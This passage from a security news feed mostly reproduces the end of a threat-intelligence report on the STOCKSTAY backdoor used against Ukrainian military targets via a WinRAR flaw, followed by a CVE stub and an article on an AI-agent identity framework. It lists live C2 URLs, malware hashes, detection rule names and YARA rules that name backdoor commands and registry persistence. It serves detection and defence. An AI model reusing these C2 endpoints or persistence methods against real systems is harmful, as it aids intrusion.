<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://google-ai-labs-it.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 20: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>November 2025: Ukraine — Drone-Related Lures and Deployment via CVE-2025-8088</span></h4>
<p><span>On November 6, 2025, GTIG identified a batch of phishing emails being sent from a drone-themed UKR.NET email account, to approximately 20 Ukraine-based targets, each containing a unique ukr.net file sharing link. Each link led to a malicious RAR archive which exploits a path traversal vulnerability in WinRAR (</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability"><span>CVE-2025-8088</span></a><span>) to install the core STOCKSTAY components. Continuations of this phishing activity were observed on November 12 and 14, 2025. We identified that only around 30% of the recipients of these phishing emails opened the emails, however we are unable to confirm how many of these individuals downloaded or executed the malicious payloads. All affected Google accounts were marked for additional authentication checks as a precautionary measure against potential account compromise. Google also notified affected users via our </span><a href="https://support.google.com/mail/answer/2591015" rel="noopener" target="_blank"><span>Government Backed Attack Warning</span></a><span> (GBAW) notifications.</span></p>
<p><span>GTIG identified two distinct types of Ukrainian-language decoy documents within the malicious RAR archives, both appearing to target Ukrainian military personnel. The first, “Донесення БпЛА 06.11.2025.docx” (“UAV report 06.11.2025.docx”), claimed to be “[A] Report on the availability/need for UAVs, their condition, the availability of crews for each UAV in the units, their training in the defense zone of the 1st Brigade as of 06.11.2025” (see Figure 10).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig10.max-1000x1000.png" alt="“Report” Decoy document from November 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9e24u">Figure 10: “Report” Decoy document from November 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The second decoy, observed as “Товари(докладніше).docx” (“Products (more details).docx”) and “Приклади товарів для листа (деталізовано).docx” (“Examples of products for the letter (detailed).docx”), predominantly comprised of an equipment list referencing: “Tactical medicine”; “Communication and surveillance equipment”; “Equipment and survival equipment”; and “Automotive property” (see Figure 11).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig11.max-1000x1000.png" alt="“Equipment List” Decoy document from November 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9e24u">Figure 11: “Equipment List” Decoy document from November 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Each of the decoy documents contained an external image reference that causes a connection to be made from the victim’s machine to a site likely monitored by the threat actor, signaling that the document has been opened. GTIG believes the URLs referenced by the decoy documents may be hosted on compromised infrastructure.</span></p>
<p><span>GTIG identified that the instances of STOCKSTAY observed being deployed during this operation contained enhancements intended to increase resistance to detection, specifically by carving out functionality into external modules. These external modules were named to imitate legitimate Windows libraries, using the filenames shown in Table 20.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Component</strong></p>
</td>
<td>
<p><strong>Filename</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><code>MSViewer.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>Shared STOCKSTAY core module</span></p>
</td>
<td>
<p><code>ms-lib-math-core.dll</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><code>MSDriver.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER core module</span></p>
</td>
<td>
<p><code>ms-api-wmcpdt.dll</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>MSRender.exe</code></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER core module</span></p>
</td>
<td>
<p><code>ms-api-win-render.dll</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 21: STOCKSTAY component filenames observed in November 2025</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><p><span>GTIG observed two distinct STOCKSTAY WebSocket C2 URLs being used during this phishing wave. The majority of instances used the URL </span><code>wss://driverx86-adobe.onrender.com/ws</code><span>; however, we were able to identify at least one instance of STOCKSTAY using </span><code>wss://google-ai-labs-it.onrender.com/ws</code><span>, corresponding to the previously described GitHub repository associated with the </span><code>ChikenFresh</code><span> user.</span></p>
<p><span>Alongside the core STOCKSTAY components, the malicious RAR archives contained LNK files, described as “Updater Shortcut”, corresponding to each core STOCKSTAY component. The extraction file path was configured to attempt to deploy into the startup programs directory. </span></p>
<p><span>GTIG was able to identify that the actor began creating the LNK files for this operation approximately six hours prior to the first phishing emails being sent, with the Ukrainian-language lure documents being created around four hours prior.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>a40bf9c75d1bfa6d66f1179f2321de6589f80d3089d992797a9cb0e84f6196ce</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>e316b1e13154dc6115e1e0c023f6fe3d17861cae839d4a4a81779b6aad9a24f8</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSDriver.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>c905cb512018cc55512c6a22677c3d6f389c47afd54d7c85797868fc4fcb90e9</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSRender.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>667a8f568a611f2f3d84a366b7946b360e055bece9699c95aad619637ab72a38</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-lib-math-core.dll</code></p>
</td>
<td>
<p><span>Module containing core crypt and obfuscation routines, historically found within core STOCKSTAY components</span></p>
</td>
<td>
<p><code>b287347a5bff8af360ce0e6500c336b6fe6d97920abc26202c9d843ffebc5f89</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-api-win-render.dll</code></p>
</td>
<td>
<p><span>Module containing backdoor command handlers, historically found within STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>1682e8d82016b3f10434d2ebac995fd3b6aa812f079bfd7888652e94a994d851</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ms-api-wmcpdt.dll</code></p>
</td>
<td>
<p><span>Module containing STOCKSTAY’s IPC logic, historically found within each STOCKSTAY component</span></p>
</td>
<td>
<p><code>e2a0f4440f67998a0215d49be31746ea192bfcb4dc4ee532a218f8cf13605714</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSViewer.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><code>3627f582420ad2782d452fe6d13fae42658d1484296351d3916703e25dcadd14</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSRender.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><code>77417df21b4b4e8d86b8bda4afeef93fd36f355362586b2d1f51121a82244167</code></p>
</td>
</tr>
<tr>
<td>
<p><code>MSDriver.lnk</code></p>
</td>
<td>
<p><span>LNK shortcut intended to execute STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><code>813c78b5b6ef28a9c0ed35f2c6cd88fc50880ab91f8777dfe7aaccb1c24b08d5</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>e83f274bf9914c6cfc0c6b3cdadf089565f49dace4aca93287c22aba9641c8f3</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>f964353b9ae4bedbe62de6c0d7eafa9fb8b87897bbaea483aedaa8ae191834da</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span>Table 22: File indicators</span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://driverx86-adobe.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://google-ai-labs-it.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 23: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Attribution</span></h3>
<p><span>GTIG attributes the STOCKSTAY ecosystem and related activity to threat clusters assessed with high confidence links to Turla, based on the following:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>STOCKSTAY uses Windows-1251 during command-processing - an encoding notably designed specifically to support Cyrillic script. This is indicative of a development or operational environment linked to Eastern Europe, the Balkans, or Central Asia. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>STOCKSTAY has code overlaps with KAZUAR, a widely-attributed proprietary Turla toolkit, based on the recent introduction of K1MORPHER string obfuscation into both malware families within a similar time window.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>GTIG observed STOCKSTAY being delivered from compromised infrastructure which was also identified as hosting part of Turla’s victim-facing KAZUAR C2 infrastructure.</span></p>
</li>
</ul>
<p><span>Turla has a consistent focus on targeting Ukrainian Defense and Military organizations, and was identified within a Mandiant Incident Response deploying STOCKSTAY alongside a range of other proprietary Turla malware, such as WILDDAY, DIAMONDBACK, and KAZUAR.</span></p>
<h3><span>Detections</span></h3>
<h4><span>Google Security Operations (SecOps)</span></h4>
<p><span>SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats, Mandiant Hunting and Mandiant Intel Emerging Threats rule packs:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Archiver Extraction To Windows Startup</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Registry Write Registry Run Keys</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Registry Write to Run Registry Key</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Potential RDP File Write From Phishing</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>RDP Connection Initiated from Staging Directory</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Onrender Subdomain Suspicious DNS Query</span></p>
</li>
</ul>
<h4><span>YARA Rules</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_2 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects encrypted configuration files associated with STOCKSTAY."
        hash = "40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3"

    strings:
        $s1 = "\"SystemConfiguration\""
        $s2 = "An application for getting information about current events on trading platforms"
        $s3 = "To set the time for updating information, enter a value in minutes in the `Interval` field"
        $s4 = "The `SystemConfiguration` field stores the system settings of the application."
        $s5 = "In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`."
        $s6 = "wss://"

    condition:
        uint16(0) == 0x227B  // {"
        and 4 of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects early configuration files associated with STOCKSTAY."
        hash = "1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f"

    strings:
        $key_required_1 = "\"List 1\""
        $key_required_2 = "\"List 2\""
        $key_required_3 = "\"List 3\""
        $key_dummy_1 = "\"BinanceApi\""
        $key_dummy_2 = "\"CoinbaseCloudApi\""
        $key_dummy_3 = "\"CoinbaseCloudApi Sandbox\""
        $key_dummy_4 = "\"ByBitApi Spot\""
        $key_dummy_5 = "\"ByBitApi Linear\""
        $key_dummy_6 = "\"Info level\""
        $key_dummy_7 = "\"Rate info\""
        $key_dummy_8 = "\"Info level\""

    condition:
        uint8(0) == 0x7B  // {
        and filesize &gt; 500
        and all of ($key_required_*)
        and 3 of ($key_dummy*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_ConfigurationFile_5 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext configuration files used by the STOCKSTAY malware family."
    hash = "6cee9e838792ac5e2098362d68ce93a9a2c095d476dc16b289fe8509c99b2b8b"

  strings:
    $internal_id_1 = "\"internal_id\""
    $internal_id_2 = "\"i_id\""
    $internal_key_1 = "\"internal_key\""
    $internal_key_2 = "\"i_k\""
    $interval_engine_1 = "\"interval_engine\""
    $interval_engine_2 = "\"ie\""
    $level_info_1 = "\"level_info\""
    $level_info_2 = "\"li\""
    $time_scale_1 = "\"time_scale\""
    $time_scale_2 = "\"ts\""
    $span_min_1 = "\"span_min\""
    $span_min_2 = "\"mx1\""
    $span_max_1 = "\"span_max\""
    $span_max_2 = "\"my1\""
    $rate_1 = "\"rate\""
    $rate_2 = "\"rt_x_y\""
    $rate_control_1 = "\"rate_control\""
    $service_1 = "\"service\""
    $service_2 = "\"srv\""
    $days_not_work_1 = "\"days_not_work\""
    $days_not_work_2 = "\"dnw\""
    $system_properties_1 = "\"system_properties\""
    $system_properties_2 = "\"sp\""

  condition:
    any of ($internal_id*)
    and any of ($internal_key*)
    and any of ($interval_engine*)
    and any of ($level_info*)
    and any of ($time_scale*)
    and any of ($span_min*)
    and any of ($span_max*)
    and any of ($rate*)
    and any of ($service*)
    and any of ($days_not_work*)
    and any of ($system_properties*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_CryptoContainer_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects code for parsing crypto containers within STOCKSTAY components."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $s1 = "BuildCryptoContainer"
        $s2 = "ParseCryptoContainer"
        $s3 = "Windows-1251" wide
        $s4 = "AesCryptoServiceProvider"
        $s5 = "RSACryptoServiceProvider"

    condition:
        uint16(0) == 0x5a4d
        and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_WindowNames_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY window names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"


    strings:
        $import = "_CorExeMain"
        $s2 = "SMEditorPage" wide
        $s3 = "SMNetPage" wide
        $s4 = "StockMarketViewPage" wide
        $s5 = "window_system32_x128" wide
        $s6 = "window_system32_x64" wide
        $s7 = "window_system32_x32" wide

    condition:
        $import 
        and any of ($s*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Downloader_STOCKSTAY_MARKETMAKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.MARKETMAKER downloader based on method names and payload filenames."
        hash = "da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40"

    strings:
        $f1 = "CheckAutoRun"
        $f2 = "SetupAutoRun"
        $f3 = "DownloadAndExtractZip"
        $f4 = "GetSystemProxy"

        $s0 = "_CorExeMain"
        $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
        $s2 = "StockMarketView.exe" wide
        $s3 = "SMNet.exe" wide
        $s4 = "SMEditor.exe" wide

    condition:
        all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Controller_STOCKSTAY_STOCKMARKET_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKMARKET controller based on method and field names, and SQL queries"
        hash = "2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0"

    strings:
        $f1 = "ProtocolMessageConnect"
        $f2 = "ProtocolMessageEnd"
        $f3 = "ProtocolMessagePing"
        $f4 = "ProtocolMessageRequestRecv"
        $f5 = "ProtocolMessageRequestSend"
        $f6 = "ProtocolMessageTask"
        $f7 = "ProtocolMessageTaskSysinfo"
        $f8 = "TMR_AppInit_Tick"
        $f9 = "TMR_Engine_Tick"
        $f10 = "TMR_KeepAlive_Tick"
        $f11 = "TMR_PingNet_Tick"
        $f12 = "TMR_PingSystem_Tick"
        $f13 = "GetDataTrade"
        $f14 = "GetDataNews"
        $f15 = "InsertDataTrade"
        $f16 = "InsertDataNews"
        $sql1 = "CREATE TABLE IF NOT EXISTS News (" wide
        $sql2 = "CREATE TABLE IF NOT EXISTS Trade (" wide
        $sql3 = "CREATE TABLE IF NOT EXISTS Market (" wide
        $sql4 = "INSERT INTO Market ( Guid, Version, Config, Status, Launch, Type ) VALUES (@Guid, @Version, @Config, @Status, @Launch, @Type)" wide
        $sql5 = "INSERT INTO News (Container) VALUES (@Container)" wide
        $sql6 = "INSERT INTO Trade (Container) VALUES (@Container)" wide

    condition:
        8 of ($f*)
        and any of ($sql*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Tunneler_STOCKSTAY_STOCKBROKER_1 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKBROKER tunneler based on known IPC message handler and variable names."
        hash = "dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22"

    strings:
        $s1 = "_CorExeMain"
        $s2 = "ProtocolMessageStatusConnection"
        $s3 = "ProtocolMessageResult"
        $s4 = "ProtocolMessageEnd"
        $s5 = "OnGetDataFromServer"
        $s6 = "webSocket"
        $s7 = "wmCopyData"
        $s8 = "tempStorage"

    condition:
        all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_STOCKSTAY_STOCKTRADER_3 {
    meta:
        author = "Google Threat Intelligence Group"
        description = "Detects STOCKSTAY.STOCKTRADER backdoor based on known command handlers and FNV1a hashes."
        hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"

    strings:
        $cmd_1 = "AppDel"
        $cmd_3 = "AppDeleteRegistryValue"
        $cmd_4 = "AppDir"
        $cmd_5 = "AppGet"
        $cmd_6 = "AppMkdir"
        $cmd_7 = "AppPut"
        $cmd_8 = "AppReadRegistryValue"
        $cmd_9 = "AppRegistryKeyExists"
        $cmd_10 = "AppRmdir"
        $cmd_11 = "AppRun"
        $cmd_12 = "AppWriteRegistryValue"
        $cmd_13 = "AppUnpackArchive"
        $cmd_14 = "ArchiveFiles"
        $cmd_15 = "GetFiles"
        $cmd_16 = "Sysinfo"
        
        $hash_1  = {ea8e5e34}
        $hash_2  = {3445694e}
        $hash_3  = {f73e97b6}
        $hash_4  = {9aa70c59}
        $hash_5  = {18b496c9}
        $hash_6  = {0f716ebc}
        $hash_7  = {8e2d79ce}
        $hash_8  = {3ae2a963}
        $hash_9  = {35d26840}
        $hash_10 = {6c41d6bc}
        $hash_11 = {1fdbbb2f}
        $hash_12 = {6ae6578d}
        $hash_13 = {66732be7}
        $hash_14 = {0b113b3d}

    condition:
        uint16(0) == 0x5a4d
        and (
            12 of ($cmd*)
            or 10 of ($hash*)
        )
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_1 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects plaintext class and method names associated with the .NET class K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $plain_api_1 = "Squirrel3"
    $plain_api_2 = "DecryptArraySimple"
    $plain_api_3 = "DecryptIntSimple"
    $plain_api_4 = "DecryptLongSimple"
    $plain_api_5 = "DecryptFloatSimple"
    $plain_api_6 = "DecryptStringSimple"
    $plain_api_7 = "DecryptDoubleSimple"
    $plain_api_8 = "_squ_ui1"
    $plain_api_9 = "_squ_ui2"
    $plain_api_10 = "_squ_ui3"
    $plain_api_11 = "InjectedSeedCipher"

  condition:
    dotnet.is_dotnet
    and 5 of ($plain_api*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_2 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893"

  strings:
    $squirrel3_code_1 = {
      00 // nop
      03 // ldarg.1
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &lt;token&gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      02 // ldarg.0
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      7E ??????04 // ldsfld &lt;token&gt;
      58 // add
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      62 // shl
      61 // xor
      0A // stloc.0
      06 // ldloc.9
      7E ??????04 // ldsfld &lt;token&gt;
      5A // mul
      0A // stloc.0
      06 // ldloc.0
      06 // ldloc.0
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      0A // stloc.0
      06 // ldloc.0
      0B // stloc.1
      2B 00 // br.s 40
      07 // ldloc.1
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_K1MORPHER_3 {
  meta:
    author = "Google Threat Intelligence Group"
    description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
    hash = "391e51354118fb87dc57650cbbd94258c3f7c0a0d6868040b7a473ad626ff25e"

  strings:
    $squirrel3_code_1 = {
      03 // ldarg.1
      7E??????04 // ldsfld &lt;token&gt;
      5A // mul
      02 // ldarg.0
      58 // add
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      7E??????04 // ldsfld &lt;token&gt;
      58 // add
      25 // dup
      1E // ldc.i4.8
      62 // shl
      61 // xor
      7E??????04 // ldsfld &lt;token&gt;
      5A // mul
      25 // dup
      1E // ldc.i4.8
      64 // shr.un
      61 // xor
      2A // ret
    }

  condition:
    dotnet.is_dotnet
    and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Gabby Roncone for technical review. We also appreciate GitHub for their collaboration against this threat. </span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39060 | ChangingTech MegaServiSignAdapter Registry input validation (EUVD-2022-41606)]]></title>
<description><![CDATA[A vulnerability was found in ChangingTech MegaServiSignAdapter. It has been declared as very critical. Affected by this issue is some unknown functionality of the component Registry. The manipulation results in improper input validation.

This vulnerability is reported as CVE-2022-39060. The atta...]]></description>
<link>https://tsecurity.de/de/3624543/sicherheitsluecken/cve-2022-39060-changingtech-megaservisignadapter-registry-input-validation-euvd-2022-41606/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624543/sicherheitsluecken/cve-2022-39060-changingtech-megaservisignadapter-registry-input-validation-euvd-2022-41606/</guid>
<pubDate>Thu, 25 Jun 2026 14:40:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/changingtech:megaservisignadapter">ChangingTech MegaServiSignAdapter</a>. It has been declared as <a href="https://vuldb.com/kb/risk">very critical</a>. Affected by this issue is some unknown functionality of the component <em>Registry</em>. The manipulation results in improper input validation.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2022-39060">CVE-2022-39060</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[New Linux Foundation project aims to bring DNS-style trust to AI agents]]></title>
<description><![CDATA[As enterprises deploy increasing numbers of AI agents across applications and organizations, the Linux Foundation on Wednesday announced plans to launch a new Agent Name Service framework designed to establish identity, ownership, and trust for these systems.



The ANS framework, which is expect...]]></description>
<link>https://tsecurity.de/de/3624299/ai-nachrichten/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624299/ai-nachrichten/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents/</guid>
<pubDate>Thu, 25 Jun 2026 13:33:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises deploy increasing numbers of AI agents across applications and organizations, the Linux Foundation on Wednesday announced plans to launch a new Agent Name Service framework designed to establish identity, ownership, and trust for these systems.</p>



<p>The <a href="https://github.com/agentnameservice" target="_blank" rel="noreferrer noopener">ANS framework</a>, which is expected to allow systems and users to verify who an agent represents, what permissions it has, and whether its code and operational history remain authentic and unchanged, will be based on the existing <a href="https://www.networkworld.com/article/965540/what-is-dns-and-how-does-it-work.html" target="_blank">Domain Name System (DNS)</a>, the Foundation said in a statement.</p>



<p>Just like DNS translates human-readable website names into internet addresses, ANS aims to create a standardized naming and discovery layer for AI agents, with the ability for enterprises to publish agent identities through domains they already control, enabling other agents and systems to verify who an agent represents and discover information about its capabilities and ownership before interacting with it, it added.</p>



<p>This, the Foundation further added, creates a federated mechanism for agent discovery and verification without any reliance on any proprietary registry or centralized control.</p>



<h2 class="wp-block-heading">Growing demand for an agent identity framework </h2>



<p>ANS solves an emerging problem for enterprises, especially in scaling AI deployments, said <a href="https://www.forrester.com/analyst-bio/charlie-dai/BIO5344" target="_blank" rel="noreferrer noopener">Charlie Dai</a>, principal analyst at Forrester, too. “The agent identity problem is already emerging in early production deployments, particularly where multiple agents interact across tools, APIs, and organizational boundaries without consistent authentication and accountability models,” he said.</p>



<p>“We have seen growing concerns around provenance, authorization scoping, and auditability in agent-to-agent interactions, especially in regulated industries and multi-vendor environments,” Dai said.</p>



<p>Agent identity has become a more critical concern for enterprises, pointed out <a href="https://www.gartner.com/en/experts/jaishiv-prakash" target="_blank" rel="noreferrer noopener">Jaishiv Prakash</a>, director analyst at Gartner: “Agent identity has moved from an architectural consideration to an operational control-plane gap.”</p>



<p>“The evidence we see from enterprise clients is consistent: they need to know which agent acted, who it represented, what authority it had, and whether its runtime behavior matched its intended design,” Prakash said.</p>



<p>Beyond the problem ANS seeks to solve, analysts also said the framework’s architecture could prove equally important for enterprise adoption.</p>



<p>“For enterprises, one of ANS’s biggest advantages may be its reliance on DNS, especially since they already use it to manage domains and trust. It avoids creating a new registry and lets companies publish and verify agent identities using existing internet infrastructure, making adoption easier and cheaper,” said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<p>More so because enterprises don’t have to build anything new, according to <a href="https://www.linkedin.com/in/znamit?originalSubdomain=in" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p>However, there are downsides to being built on DNS, especially on the security front, Dai cautioned.</p>



<p>“DNS was not originally designed for high-assurance identity. This will make it susceptible to spoofing, hijacking, and latency or propagation inconsistencies that can undermine trust guarantees,” Dai said.</p>



